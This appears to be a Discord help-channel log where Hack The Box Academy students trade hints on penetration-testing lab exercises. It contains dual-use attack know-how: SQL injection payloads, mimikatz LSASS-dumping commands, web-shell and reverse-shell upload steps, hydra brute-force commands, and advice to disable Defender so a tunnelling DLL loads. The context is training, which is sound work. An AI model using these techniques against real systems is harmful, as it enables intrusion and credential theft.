Probably plenty of people have, just ask your question

copy

ok im trying to reverse shell I put everything in right and the page just hangs

on the msfvemon it will give me this after 5 mins of hanging

What section

basic exploitation - upload exploitation

I tested it on my machine and it works

What steps did you take?
Should be to create the payload, upload said payload, run netcat with the port you specified, navigate to the page you uploaded. The page could/should hang while you have the connection open.

yes but the shell is never created

I created payload ran nc with the specified port then uploaded the payload and downloaded it

By download do you mean navigated to?

I hit download

it gives me a not found page

http://83.136.252.32:40858/uploads/reverse.php gives me the same loading

I'm confused, it's been a while for this module, why are they wanting a rev shell when it's a public address, that won't work without the student modifying their network.

Use p0wnyshell and forget netcat for the moment.

@glass quail

how would I get the shell

the flag

im using the pwnbox to access the website

i was on the last part of the skill assessment and my lab timed out

I guess the first half of that module talks about web shells

literally about to type the mimikatz command

The first half of the modules shows phpbash, use something like that or p0wnyshell.

Noooooooooo

where is that

It says in the section near the top. Sorry I kept saying module instead of section

Try to exploit the upload feature to upload a web shell and get the content of /flag.txt that the objective for this section

ok thanks

will try it out

"Web Shells" at the top of the page is what you want

30 mins later

Evil-winrm slow af

which skill assessment are you on

smb server? doesn't work for me

so yeah it's my only way

impacket smb is a way, so is http

https://academy.hackthebox.com/achievement/667914/143 i have done it!

took me ages LMAO because i procrastinated

It's a big module

https://tenor.com/view/hhgf-gif-25031041

if you can rdp that can be faster (xfreerdp has the /drive: option

last time i touched this module was like 3 weeks ago LMAO

i saw how that big module was so i skipped everything and done that LOL

i should have had it done then

definitely don't recommend skipping over it

lots of TTPs that are pretty useful to know

i meant skipping the other modules and doing that module first

I like the labs and how all over the place you are

The phpbash worked thank you

again i also don't recommend skipping any to get to that point though i'm sure you've been chewed out plenty because a lot of the stuff was mostly already covered in other modules

i.e. file transfers/lateral movement/upgrading shells

I feel that module should be further down the list

:) i think i should rest before starting

eh it's at a decent spot in the list

i already knew those stuff but i get your point but i wasnt in alot of struggle

I started that one too lol

most of the stuff required at least for the second assessment was 100% covered by the module

i'd say the other 10% was remembering how certain commands worked

good job i just started ad attack and enum yesterday myself haha

it be like that LOL

in reality i probably spent maybe like 3-4 days actually working on it

that is pretty much how long i spent

the thing is i was doing all of that module at my work LMAO

of that maybe half that time was just waiting on enum tools to finish

I accidentally did the first lab blind and was sad when I completed it so quickly.

i think that's a healthy way to do it imho ¯_(ツ)_/¯

tyrna be like you LMAO

just push forward then worry about the questions after

I was having too much fun

the skill gap is insane from me to u T-T lol

wasn't like a lot of people's complaints about the whole admin thing for the one user or was that a different module entirely

¯_(ツ)_/¯

still painfully slow

Might be your connection ig. If you ping it what's your avg rtt? (ping -c 5) should give a rough estimate

TCP or UDP for the VPN? Assuming bad Internet means you're on tcp and that means poopoo transfers

300ms

At least it's stable

or I might try to dump lsass remotely

So we can rule out littering being the issue

Whatever goats your boat

But in all honesty gl :)

or upload mimikatz

If that would be faster

Idk if mimikatz is larger or not

dumping lsass remotely is better

also there's a tool by areous I think it does a good job

@next bronze tool do be goated

https://xre0us.io/posts/saving-lsass-from-defender/

which event ID was it? I'm sill stuck

never mind guys

👍

been stuck at this 1 question for 1 hour:) htb really needs to improve their RDP

anyone has completed the "intro to whitebox pentesting" skill assessment? i am kind of stuck and hope for some help

Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.

yoo no spoils

Need some help with the first bash script, please

Attack Common services, SA-easy lab usually get connection time out issue, please check it

I guess those were just potential CLSIDs, I tried running the test_clsid.bat script to narrow down the choices and went from there to get the right fit, hint: 85C}

I tried running the test_clsid.bat script to narrow down the choices and went from there to get the right fit, hint: 85C}

I guess those were just potential CLSIDs, I tried running the test_clsid.bat script to narrow down the choices and went from there to get the right fit, hint: 85C}

I tried running the test_clsid.bat script to narrow down the choices and went from there to get the right fit, hint: 85C}

anyone i can dm for blind Server-Side JavaScript Injection in the nosql module?

i have a script that is working, but i breaks at a certain chr limit

essentially i just dont know if i have all the characters that are expected to be used

rn im using

",$_-#{!}'"+"1234567890"+"abcdefghijklmnopqrstuvwxyz"+"abcdefghijklmnopqrstuvwxyz".upper()

turned out the character ' ruined the payload

This question in Active Directory Enumeration and Attacks...
I think I have done everything, from net commands to dsquery and more, some text editing here and there and nothing found. Can anyone provide a hint or something?

Im currently doing the Skills assesment for Window Event Logs and im stuck on q1

isnt the answer ||mmc.exe||? I used this XML query

<QueryList>
  <Query Id="0" Path="Microsoft-Windows-Sysmon/Operational">
    <Select Path="Microsoft-Windows-Sysmon/Operational">
      *[System[(EventID=7)]]
      and
      *[EventData[Data[@Name='SignatureStatus']='Unavailable']]
    </Select>
  </Query>
</QueryList>

do you include the /domain option?

mhm local i see

Yes I did. I tried things like net group "Local Admins" /domain and net users \domain and tried dsquery to go LDAP

should be fine to just do net group "Administrators" then

There is no such group

then administrator

i dont think its the group "Local Admins" you want

should find administrators

do not include the /domain option

Yes I tried that 😂 It does not exist either I think.

Wait why?

because its local

Is this how it works? Give me a moment

net localgroup administrators

Oh I see...

I got it

Wow seriously? 😂
The wording of the question is really wierd then, given it says what domain user

Thank you for the help @placid edge ❤️

"which domain user is a local admin"

the wording is right

That's it, it said which 'domain user' is part of the Local Administrators group. I thought I should be enumerating the whole domain and searching for a someone in the local admins

The wording is fine, the understanding was wrong 😄

Alright my bad 😂

ok i got my local testing payload! now will need some modification to get the target's flag..

greetings, I'm solving the usage room, i did sql atack, I got the data base, I found the password and the user name, but when I log in, I get two errors, either a password error or an expiration date

hey i am stuck on module "Attacking Common Services" section DNS Attacks. I am running subbrute but it doesnt gives me any results

figured out the issue, had to open via saved logs instead of double clicking evtx 💀

Answering to myself: coertion is needed, which can be obtained with printerbug.py for example.

if there are people who are stucked with intro to whitebox pentesting skill assessment 1 can dm me... 😄

verify your account in #welcome to access #1228763236409802814

Use the ip of the target

oh thanks @soft cedar helped me

idk why but the problem wa to use ./ instead of python3\

I used
admin' or '1'='1'-- -
for an SQL injection, but
admin' or '1'='1
did not work
What would be the reason for that?!

It's pretty much the same payload!

It's pretty much not the same payload. The first one is commenting out the rest of the query, so if there was a password requirement you effectively deleted it.

I thought the second one would work since the quote is left off at the end to close that portion.

But the rest of the query is still there so you will need a matching password

I didn't see the
admin' or '1'='1'-- -
example in any part of the module, so I was confused. I found it in a walkthrough of some box.

Yeah that makes sense now. I guess the module can only teach so much, a lot of this is trial and error since it's blind.

to visualize against the original query how the other two work

original query
user='admin' and password='admin'

admin' or '1'='1'-- -
user='admin' or '1'='1'

admin' or '1'='1
user='admin' or '1'='1' and password='admin'

that comment makes a big difference

Module: HTTPs/TLS Attacks - Skill Assessment
I was able to decrypt/encrypt the cookie and get the admin token validated, but it says to check the email for information.
Can someone provide any tips on how to get the flag?

yup, same here.

no perms to general

#welcome read and follow

@fringe urchin thanks dude.
But the thing is I can't complete my identification. It errors out. I tried regenerating my account ID and still same error.
Is there a specific channel where I should contact or ping any online mod?

Hello guys I need help on this module problem...

You can send me a DM

Search for "wordpress xmlrpc attacks" and find out how to use it to execute all method calls. Enter the number of possible method calls of your target as the answer.

I used burpsuite and sent a POST method on the website. But idk what i'm looking at and how many method calls are there.

The response from the POST method

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml; charset=UTF-8
Connection: close
Date: Wed, 17 Apr 2024 14:16:20 +0000
Content-Length: 403

<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
  <fault>
    <value>
      <struct>
        <member>
          <name>faultCode</name>
          <value><int>-32700</int></value>
        </member>
        <member>
          <name>faultString</name>
          <value><string>parse error. not well formed</string></value>
        </member>
      </struct>
    </value>
  </fault>
</methodResponse>

I need help. Im trying to connect ssh but it keeps saying password denied what I'm i doing wrong

ssh htb-student@???

the ip the give you is what u put after the @

Does anyone know which module in htb platform I can practice with burp suite?

anyone know how to troubleshoot pwnbox stuck on starting? ive tried changing the location

nvm i just had to retry a bunch

anyone got gold/silver annual? I Wwant to ask something

Hey, Im really interested in the path Senior Web Penetration Tester, but it is very expensive. Is there any student discount available?

nope it didn't have...

to bad, I really like that path, but the price is prohibitive for me

yes the price is a little bit expensive... but if you really love web app pentest, you could check out other platform too

What do you recommend? Burp stuff?

I'd do portswigger academy if you're looking for free labs for web stuff

SecureFlag, PortSwigger, PentesterLab, bug bounty hunter, hackerone CTF....

there are a lot of options and I think the hardest/ annoying part of web app pentest is to collect payloads/ methods...

Hello, Im doing the Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux. Question 1 and im running this command ```GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley

whats up

when did the voucher expiry?

think its 1 year

anyone?

Hello can you help me please, if I want to dump lsass, what I must to do?

mimikatz with options :

privilege::debug

sekurlsa::minidump lsass.dmp

sekurlsa::logonpasswords (incorrect) it is not okay

so I use lsadump::lsa

but I don't find my answer and normaly she is on the lsass.dmp

Is there another channel that's used for course support for academy modules? I assumed that was here but I'm not sure if there's somewhere else where these questions should be asked/answered instead

you are at the right channel

which module arw u doing

Was doing the linux priv escalation - abusing sudo. I checked some writeups and looks like the module has changed and seems as though I have to exploit openssl to execute a command now. But the only was I found to do it was to write a custom c++ code to be an openssl engine to do which is kind of a pain when I haven't written anything in c++ for years. Does not seem like an 'easy' module to me to have to relearn a whole language to do a small piece of it. Is there any easier way to do some type of command injection to openssl other than an engine?

https://academy.hackthebox.com/module/158/section/1441

here

check out gtfobins

theres a section in there about openssl that u can use to priv esc

im pretty sure u dping openssl with sudo correct?

Yeah that looks exactly like what I needed. Been on there before but had forgotten the link. Thanks!!

anyone can help me with Escalate privileges and submit the contents of the flag.txt file on the Administrator Desktop. (Windows Privilege Escalation Skills Assessment - Part 1 - module)

Hello, Im doing the Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux. Question 1 and im running this command ```GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley

sorry bro i forgot about what i did maybe its not lsass u shoyld be looking for

oh snif

no problem

have u tried tk see if u can get the SAM @dreamy solar

you might want to re-evaluate this one...

can someone give me a hint to get me started for the medium lab on footprinting?

finaly I find I don't know why it is not okay before reboot machine

I'm having a hard time getting my brain into gear and I've been thinking for days and I know I should use nmap

but I am having trouble figuring out what to scan for? without giving too much away could I get a hint to get my brain started in the right direction?

enumeration

ya I know but just any and all enumeration?

like is there something I can look up on google to get me in the right direction?

you said to get started ¯_(ツ)_/¯

ok thanks

have you tried anything?

ADCS Course, PKINIT Module

Any idea as to why I'm getting the KDC_ERR_C_PRINCIPAL_UNKNOWN error when using the same syntax as the course? It should be pointing to the new computer account we just created with passthecert.py, no?

I will get back to you in 30 minutes after I try some stuff. I tried Nmap yesterday I searched for RDP vulnerabilities and SMB vulnerabilities and maybe DNS and didn't find much.

I found that ports are open

but don't have password to login

found domain name etc but couldn't find username

hello anyone faced the same issues when runing dirsearch

which is needed to get password

i'm stuck here during 3 days

review all the open ports, your knowledge should not need to expand past the sections for this lab

ok thanks

should I keep reviewing previous sections based on particular open ports?

yes

ok thanks so I'm on the right track ok thanks

I'll get back to you in 30 or whenever

so what does cause machines to die with like an hour left

i tried Invoke-WebRequest to upload juicyPotato.exe, but doesen't work

evilwinrm?

to upload

hmmm

i sent dm to you

Hi module Enumeration with nmap. Hard Lab. I am being asked to find the version of one of the running services on the target? The flag should be in one of the version strings correct?

Well its gonna be shown as a flag HTB{}

ok well i found some services and enumerated their version. no flag. Therefore i have not found the right service i guess

Thr flag will be shown once you connect to it via nc but yea most likely you havent found the correct service yet

Hi guys, I wanna do an attack in Active Directory Compromise from AEN. I cracked the guys password and went to the next stage but I'm getting an error that the ad cmdlets aren't installed. Don't know how to redact so sorry for being vague 😄

Help meeee

Yes any and all enumeration is a good idea for any lab

hmmm

nmap -Pn -n --source-port 53 -oA <filename>

should that just scan the top 1000 ports?

Nmap scans like top 1k by default. But you would need to scan all in this exercise

what i found strange is that the above

found me a very high port

like above 40k

and that's strange to me because i thought it's only the top 1k

Its top 1k most common ones and not 1-1000

ah

moved on to udp ports found 3 tcp ports

Pretty sure there is no need to scan udp. Takes a loong ass time to scan em

Its a pretty high tcp port

yh

hmmm think i already have it then

Whats the last 2 numbers of it?

00

Should be correct

(i hope)

😄

I realized what i asked after i sended

I didnt enjoy the module at all. But hey, maybe some others did. Footprinting was muuuuuch better imo

i've started dipping into fotprinting but being stubborn and trying to finish the hard lab

it's not that the content isn't good

it's just that it's hard to test the knowledge with the flags

Meh yea its more like trial and error and be patient with thr scans.
Meanwhile footprinting covers a lot and the easy, medium and hard labs cover almost everything if not everything learned

The medium one was really great and enjoyed the hard one aswwll

meh

don't get anything connecting to it via nc

nor when i set my source port

You sure you arent being blocked by the firewall?

yeah i'm using source=port

i noticed that firewall drops unless using sourceport in the nmap scans

Yea but if you hit the limit you still are beint blocked regardless if you source it

still within limit

Whats your command

sudo nmap -sV -p <port num> 50000 <ip> --source-port <port>

this gives me open port and attempts to give me a serivce versiuon

i note that i do need the source port set

for nci use

Yea you tried to connect to it via nc?

nc -p <src port> <ip> <dest port>

Hmmm

hmmm just reading about tcpwrappers

I mean your command looks mostly the same as mine

I used -nv which is for disabling dns res and v is for verbose

i think what's happening is the fw is completing the tcp handshake which is the behaviour of tcpwrapper if u are not in the list of hosts that is allowed to access the service behind the port

Does it say TIMEOUT?

They you are being blocked by the firewall

no timeout

Try again and wait a few seconds

I remember i waited like 10-20 sec before it got established

strange

ahthat's what it was

too impatioant

i was typing stuff into the terminal

and i think that broke it

goddamit

Is there a way to add a user to a group without ActiveDirectory cmdlets?

net user /domain if you have privs?

#modules message

I suffered for a long time there but found a way with ASDI and managed to get the hashes.

doign skills assesment in the kerberos attacks module

its unplayable slow

this makes 0 sense Perform manual enumeration to discover another installed plugin. Submit the plugin name as the answer (3 words)

i fucking did 6 times

Thanks for this

It'll come in handy to do it all over again tomorrow

Perform manual enumeration to discover another installed plugin. Submit the plugin name as the answer (3 words) the only 3 word plugin isn't right. and there's no version did a former offsec content dev write this question?

Could I dm someone who passed HTTP Attacks Skills Assessment, I ran out of ideas after trying for 8 days. Seems that I got the TE.CL via te.te and crafted the payload to passthru WAF, but email is not triggering.

I'm working on:

Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer.

And I'm using:

hydra -l sam -P ./mut_password1.list ftp://10.129.24.92 -t 64 -vvv

all children were disabled due too many connection errors

I scanned the instance and it's showing FTP is open.

Well, FTP is definitely working:

ftp ftp://sam@10.129.24.92
Connected to 10.129.24.92.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:

Can you provide the module and section?

nvm - It seems as you're attacking the wrong service... furthermore, if you search for this particular question in discord, there are suggestions to remove quite a few (first ~17k) of the passwords from the list.

Password Attacks - Password Mutations

Thanks for the help. I have no idea what I'm doing wrong and am ready to move on from this section. 😐

In Windows File Uploads, why does HTB say there's no powershell upload functionality so we have to use the PSUpload.ps1 script, but then at the bottom for FTP uploads they use a powershell upload function

Not 100% on this one, but I guess the upload function comes from the script? So to say: There is no inherent upload function, but you may import it with the script.

I don't think that's it because this is what they used to perform uploads from the powershell script

But the first picture I posted uses Net.WebClient.UploadFile which I think is different

Ah I see.

So should I table my issue for now?

Depends on if you're able to figure it out?

Thanks for the help.

You're a very generous and wise person.

No please, don't strain yourself.

Go help someone else.

I think it's just an issue of wording - -meaning: There is no real built-in functionality, but you may "abuse" the Invoke-WebRequest or Invoke-RestMethod to be able to upload stuff.

This reminds me of OffSec.

?

Did you get laid off by them?

I just cant help but think that isn't it because this isn't Invoke-WebRequest or Invoke-RestMethod

maybe it is and im wrong but i just see the conflict

yea this is different https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.uploadfile?view=net-8.0 from https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.4

Fair enough - it could be an error... in the end: You just need to know how to upload stuff. 😅

yep xD

good to know many tricks

If someone could reach out to me to provide assistance, I'd appreciate it.

i would help but im not in that section yet, sorry 😪

I literally told you that you're attacking the wrong service and that you need to remove a lot of passwords because it's slow. What do you need more? Should I login with your credentials and solve it? Like wtf.

Do you work for HTB?

Do you see any indicators for that?

And no, attacking SSH doesn't work either.

Don't talk to me then bud.

Dude, I've solved this challenge without a problem and am just trying to help. 😂

DM me if you want to continue.

Yeah, go figure.

Yeah, putting on a show. Sad.

No need for that.

[ERROR] ssh protocol error

Reset the machine and try again.

I have, 3 times.

Fun. What does nmap say?

Port 21 and port 22 are open.

Checked versions on both ports, those also come back open.

Sorry then, as per my notes you're not doing anything wrong.

Forums is always a nice place to go. https://forum.hackthebox.com/t/password-attacks-password-mutations-academy/265287 This helped me with the module.

I tried all of this and unfortunately nothing is working.

I can attempt to login to both though.

It's very strange.

What exactly are you struggling with on this module

I'm working on:

Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer.

And I'm using:

hydra -l sam -P ./mut_password1.list ftp://10.129.24.92 -t 64 -vvv

all children were disabled due too many connection errors

How did you mutate your password list

you tried the 48 threads instead of the 64?

Yes.

hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

Okie I would suggest doing more to see if you can tailor a little more

The tools are not connecting to either service.

Can you ping the machine ip?

Yes, and I have verified they're up and open via nmap.

What are the errors you are getting?

[VERBOSE] Disabled child 36 because of too many errors
[ERROR] could not connect to target port 22: Timeout connecting to 10.129.24.92

is the privesc 'test your skills' end lab supposed to be so laggy on ||/blog|| as well as giving me the wrong IP addresses? not sure if its technical issue or im meant to intercept the links and put the correct IP in.. afaik theres no lateral movement

Are you specifically attempting to bruteforce SSH?

I've attempted to brute force both as the info I found online lead me to believe that I should be targeting FTP instead of SSH.

You're right on the money there. Going back and re-attempting now for a sanity check for you.

I mean you can do either but SSH just takes longer also hydra should you give you a warning telling you have to many threads going for SSH that's probably whats happening with that error msg

But yeah I would take a look at your mutated password list it needs to be curated a bit more

I took it down to 1 thread and it works.

Also we all struggle with stuff when we're learning I know I do so just don't give up keep working at it and take a break if your getting to frustrated and most importantly don't feel bad

There's nothing to work at, it won't connect even with 4 threads...same errors.

[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[ERROR] could not connect to target port 22: Timeout connecting to 10.129.202.64

[ERROR] 1 target was disabled because of too many errors
[ERROR] 1 targets did not complete

I'm submitting a ticket. Thanks anyway.

Go slam ftp again. This one takes a bit if I'm remembering correctly. Adrestia is right though, if you can cut down the list it will become significantly less painful. This was one of my least favorite modules, but there is one post in the forum that gives you a significant hint in cutting down the list. It will most likely still take long, but at least you won't be waiting forever. I'd say pop hydra and let it run while you kill an episode of the new fallout series. lol Try 32 threads too. That's what I'm running at with no issues so far, but that might just be my machine.

I completed the sanity check and I was able to pop it after about 12 minutes with a post from the forums

Oh I did cut the password list...

I'm only using the end of the Bs and up.

The problem is (again) that it's not connecting.

And now I moved on to another module a couple sections forward and the IP won't ping.

My mistake. Can you do me a favor, try -t 32 against with your shortened list? Let me know if you get an error?

I tried -t 4

It connected initially, then dropped off.

Can you do it against ftp again? Maybe try -t 24? And are you using the pwnbox or a personal machine?

Let me know if that throws an error.

I'm using Parrot on my own machine.

I'll try pwnbox.

Did you try against ftp with the threads at 24, and it threw an error?

48 threads works fine. why did you "cut the password list to the end of Bs"?

I was looking at forum posts and that was one of the suggestions that was made.

yeah i wouldn't listen to that post

Well, again...it's not even connecting so I don't see what the list matters at this point.

Regardless of the list I use the problem remains.

What is the error you are getting when attacking ftp?

Same as SSH.

hammering it with 64 threads causes it to die i think. restart the box, use 48 threads

I restarted it and tried 4 threads.

Same result.

maybe see if there's some verbosity or debug option with the tool you're using then. i didn't have an issue with the tools in that module.

i was on kali though

@valid viper you are ubable to connect to ssh?

well to brute force ssh

I could connect and was prompted for a password for SSH and FTP.

u just unable to find the pass to brute force?

he said his tools aren't connecting to the target

ah can i see the command u are running?

anyone can help me with Windows Privilege Escalation Skills Assessment - Part I in this queston Find the password for the ldapadmin account somewhere on the system.

i tried ||where /r C:\ password.xml password.ini password.txt password.config|| but doesen't work

Feel free to DM me

hydra -l sam -P ./mut_password1.list ftp://10.129.24.92 -t 4 -vvv

which module is it?

make sure your wordlist has 94k lines, then just filter by those stating with B grep -E '^B' and try with the new list

The next section is just as much of a pain.

Could try restarting your vpn connection. Sometimes I have to restart mine after a few hours when I'm having connection issues to the service.

I'm dumping this module until I have money to pay for a tutor. This is garbage.

I've gone through the entire CBBH and up until now I've never had problems like this.

did it work on the pwnbox?

If anyone knows how to complete this module and wants to get paid, DM me.

i will help you for free, but everything you've described here makes it sounds like it's a problem with your computer or the tools you're running. if you can connect to the services with regular ftp/ssh commands then the box is up. i would start by trying it on the pwnbox like you mentioned earlier to help narrow down the issue.

I don't think you understand, I don't like this OffSec style education.

I'm happy to screenshare and prove that I'm not the problem, this module is.

I've gone through the CBBH and completed it already, and completed the CPTS up until this module and it's trash

the problem is i can provide screen shots of it working fine

many people have also completed it without issue

as i said everything you've said to this point indicates it's a problem on your box's end

Have them DM me.

plenty of people have done it, try a new vpn, make sure you have a stable connection

^

I'm not gonna dm you but I have done it

Did that.

what were the results from the pwnbox you said you were going to try?

did the pwnbox work?

Honestly bro I moved on to the next section and the connection to Remmina keeps dropping.

And I had connectivity problems a couple days ago also.

My time is worth more to me than this and I just want to get this done.

their servers are in another continent for me and I did the whole cpts path and many other modules without much issues

I did the entire CBBH without issues...

I'm happy to prove it.

I'm not gonna argue with you, you're free to skip if you want

<@&861185840277487616>

paying to solve modules, yeah okay

I'm asking for tutoring.

Which I stated above.

Baseless accusation.

this is funny as fuck

Yeah it is.

This is why I don't link accounts.

I'll give you the benefit of the doubt this time. Please don't use Discord to supposedly offer paid services. You only get 1 warning.

I'm not offering services.

I'm offering to pay someone to tutor me.

Where did I offer MY services?

yeah dont do that either. plenty people will help for free. What are you struggling with?

Give me the means to identify you to HTB please.

what?

Do you work for HTB?

I'm sick of having my time wasted and being threatened.

why don't you pay an actual tutor or pentester etc

I just offered to bud.

Who is threatening you?

You can click on his name and see his badges, he's also in the discord admin list in the people list.

That's enough to ID him with HTB?

I can reference this screen name?

Accusing me of breaking rules or whatever is seriously hilarious. Look at the chat.

Reference me for what? HTB knows who I am lol

Good.

We volunteer for them. We talk with some staff members regularly. Yes, they know who we are.

I've been trying to get help with this for a while.

Uriel bro just take a step back man. not worth all this.

Hi @valid viper, if you have some constructive criticism about the modules / CBBH I suggest you leave some feedback here: https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

I've been respectful this whole time.

Okay, help with what?

I even offered to pay for help. Then I get accused of breaking rules?

I misunderstood the situation. Relax.

Clearly I'm just trying to get help.

Okay. Again, help with what?

Tier 0 modules are open for discussion, anything else not so much.

I'm relaxed bro. I just don't like it when people are mean to me when I'm just trying to learn.

Password Attacks --> Password Mutations

Who is mean to you? I told you i misunderstood the situation.

David was pretty rude earlier.

Dunno who that is, but next time, if someone is being a jerk, you can ping a moderator.

[VERBOSE] Disabled child 36 because of too many errors
[ERROR] could not connect to target port 22: Timeout connecting to 10.129.24.92

The error is self explanatory

And yet... I can ping the IP, and verify the ports are open via nmap.

And when I attempt to login to FTP/SSH I can get to the login prompt(s).

What tool are you using?

hydra.

Try reinstalling it

Try another tool

Just as an FYI, this is the same advice you would get if you paid someone.

And I'd tell that person that hydra worked fine a couple days ago.

And that john doesn't work either.

And that when I tried the very next section...I was unable to access the box via RDP.

Neither remmina nor xfreerdp work on that one.

Box prob shutdown. The labs run for limitted time.

You're a funny guy.

Find someone else to help you then.

Do better HTB.

Up until this module I've been a huge fan. Thanks and good night.

I put my dinner down to try to help you. How about you learn proper manners.

East coast.

Im central

Almost 9pm for me.

I hope it's not a steak.

I'm running Parrot on bare metal.

I would like to point out that subscription users do get tutoring. That might be up your alley since free help is insufficient for you.

I am a subscription user.

VIP+

And a silver annual member.

That good enough?

Then use the proper channels for that. I'm not a subscription user so im not sure what that looks like

It doesn't look great...LOL

But again, up until now MUCH better than OffSec.

IDK what else to tell you.

Nothing bro, all good.

I've learned my lesson. I sure won't be coming back here when I move on to the CWEE.

In the future, might be worth considering your tone. I understand the frustration you are having, however, being aggressive with someone who is not obliged to help you (for free at that) isn't the way to go.

https://tenor.com/view/tissue-gif-21973725

No thanks hon.

You want to hear my tone?

lol

I can invite you to my server and we can hop on voice.

No thanks

No I'd imagine not.

You really should chill though.

Why?

I haven't done anything, at all.

I've provided respectful feedback to HTB while also complimenting them.

I haven't called names or anything juvenile like that.

I mean seriously, you're being sensitive on this and ought to hear my uh, tone to put you at ease.

Missouri?

https://tenor.com/view/excited-so-gif-23170060

Just from my interaction, I tried to help troubleshoot. Not sure how HTB is at fault b/c it sounds like your tool is broken or the machine died.

I tried John and Hydra.

What about missiouri?

And again, on the next section it wouldn't let me into the remote desktop.

Seems like Missouri.

Definitely not Tejas.

What are you on about?

Nothing mane.

Good bruh

Did you get the Packet Squirrel v2?

I'm off now, this channel is for discussing modules.

Adios frate.

I got the username of the server and the folder from NFS for the medium footprinting lab. I am looking at remote access protocols with Windows. Am I looking in the right place or is RDP or WinRM, etc. a bad place to look?

where should I be looking?

One sec I'll look.

Definitely NFS.

ok thanks

Mount that sucker 🙂

@quasi wave

I did

DM me.

ok

i gotta finish the pivoting module already

go learn ligolo

that's the plan.. i just have do the assessment

I did it twice one with ligolo and one without it

yeah i was thinking of doing it without first then learning ligolo to see the difference

Huge difference, but the other methods have their uses too

Ligolo-Ng supports various protocols, including ICMP, UDP, SYN, in contrast to Chisel, which operates primarily on HTTP using a websocket

Looks interesting. Well, if nothing else I'm glad I learned this today.

It makes pivoting easy, I didn't like chisel, MS just does weird things at times, proxchains is well proxchains...

whats your gripe with metasploit gubarz

So many times I'll setup a route and either it kills the connection or the endpoint drops and then I'm just wasting time troubleshooting ms instead of having fun

hi I have the contents of important.txt file in the windows rdp so now I need to use that information to get to the next step. I need to log in as admin?

Are you asking or did you try?

hold on trying right now

Chisel is a nightmare when it comes to double pivot

Specially if you want rev shell

https://tenor.com/view/ronaldo-wine-meme-gif-11534965294419657128

hi I got into RDP login and now I have contents of important.txt, as said above and I'm trying to login as DBA. Its saying connection was successful but its saying it cannot connect due to an error. Am I missing something here?

can someone help me out here?

What’s the error

TITLE: Connect to Server

Cannot connect to WINMEDIUM.

ADDITIONAL INFORMATION:

A connection was successfully established with the server, but then an error occurred during the login process. (provider: Shared Memory Provider, error: 0 - No process is on the other end of the pipe.) (Microsoft SQL Server, Error: 233)

For help, click: https://docs.microsoft.com/sql/relational-databases/errors-events/mssqlserver-233-database-engine-error

No process is on the other end of the pipe

BUTTONS:

OK

The connection was successfully established but then an error occurred during the login process

Using Windows auth?

this is in Microsoft SQL Studio Server

the above screenshot is my reply to that comment

Can you not attempt to login, just errors as soon as you open it?

if I click connect it spits out the error

Pivoting > RDP and socks tunneling with socks over RDP. Downloaded socks over RDP plugin.DLL and I cannot regsvr32 socks over rdp .dlll, it refuses to load but the entry point was not found. In loading this after I unzipped it and it just won’t work

Can anyone help me I’ve been stuck for days on end

You can fumble through the services and restart the mssql related ones or restart the box

ok so I'm doing it right tho?

It should just give you an auth failed message if you're doing it wrong

ok thanks

Any error messages?

The module socks over RDP plug-in dot DLL was loaded but the entry point DLL register server was not found

May I ping you

No, did you disable defender?

I’m on a work computer so laugh at my pic

I just restarted the target box. it is still giving me the same error

I didn’t know to do that

But it’s off from what I see

This makes no sense I’m doing what the lab told me something is missing or misleading by omission

I don't have my notes for that section

I started target box and it didn't work

:/ using local auth or Windows auth? And you have the server selected in the drop down ?

Is Windows auth the one where I'm already logged into Windows I'm just trying to log into the SQL server from Microsoft SQL Server Studio?

I open Microsoft SQL Server Studio and then try to connect

once RDPd into Windows

If anyone can help please let me know this lab doesn’t make sense per the directions and is misleading in some obscure way that’s not being taught

gubarz pretty much gave you the answer already. there are protections running preventing the dll from loading.

Defender is off

u suee

sure

I looked at customized settings and it’s all “turn off windows defender firewall)

windows defender != windows defender firewall

^

Click manage settings and turn off real time protection

This random screen shot, should say Windows auth

Still didn’t work

I turned off real time

show a screenshot that shows your command along with real time being off

Sorry using a work laptop can’t screen well

windows auth also gives errro

looks right to me, should work with it disabled.

are u running it with admin rights?

ahh yeah good call

non-admin powershell

Yes

Something is very fucky

maybe delete it and re-upload it and try again with the anti virus off and with admin privs

Ha, better error, that user cant login, delete your screenshot

Works

For all those stuck on this. Make sure you turn off real time virus ( then download file) a HUGE point not even shown in the lab

That’s a load of crap to not even mention it

Hmm?

Tejas as in Texas amigo.

Like Califas.

I tried it on pwnbox, same thing happened.

Way cool 🙂

You reach out to support?

they can help figure out the issue

Now it's giving me errors XD

On FOUR threads.

I already reached out to them.

I've tried this on bare metal Parrot, a Kali VM, and pwnbox.

XD

Whats the error?

/ module

Password Attacks / Password Mutation

I mutated the password list in that module.

Then I used the list with the user sam to bruteforce the box's SSH with 4 threads via Hydra.

Whats the error hydra's giving you?

1 target was disabled because of too many errors.

try adding -t 4 to the hydra command

I did.

I tried 64, 32, 12, 4...

1...

Added the space between -t and number right?

(sometimes its missed lol)

Indeed, yes.

About only idea i got tbh, Support can help more though.

Yeah we'll see.

I honestly hate brute-forcing in the first place.

I don't see the point.

Hi, i need help on Introduction to Whitebox Pentesting skill assessment 2 which requires patching of code

And for this very reason...lol Even HTB's box is saying 'Whoa, too many requests. Shutting down.'

I completed it thanks

Delete your screenshot

ok

Hi i need a nudge on skill assessment 2 on Introduction to whitebox pentesting 😄

ouuu spanish speaker

Little bit.

I'm doing the module file upload attacks and im on the white list filters sections is there way to automate the process of checking extension will execute

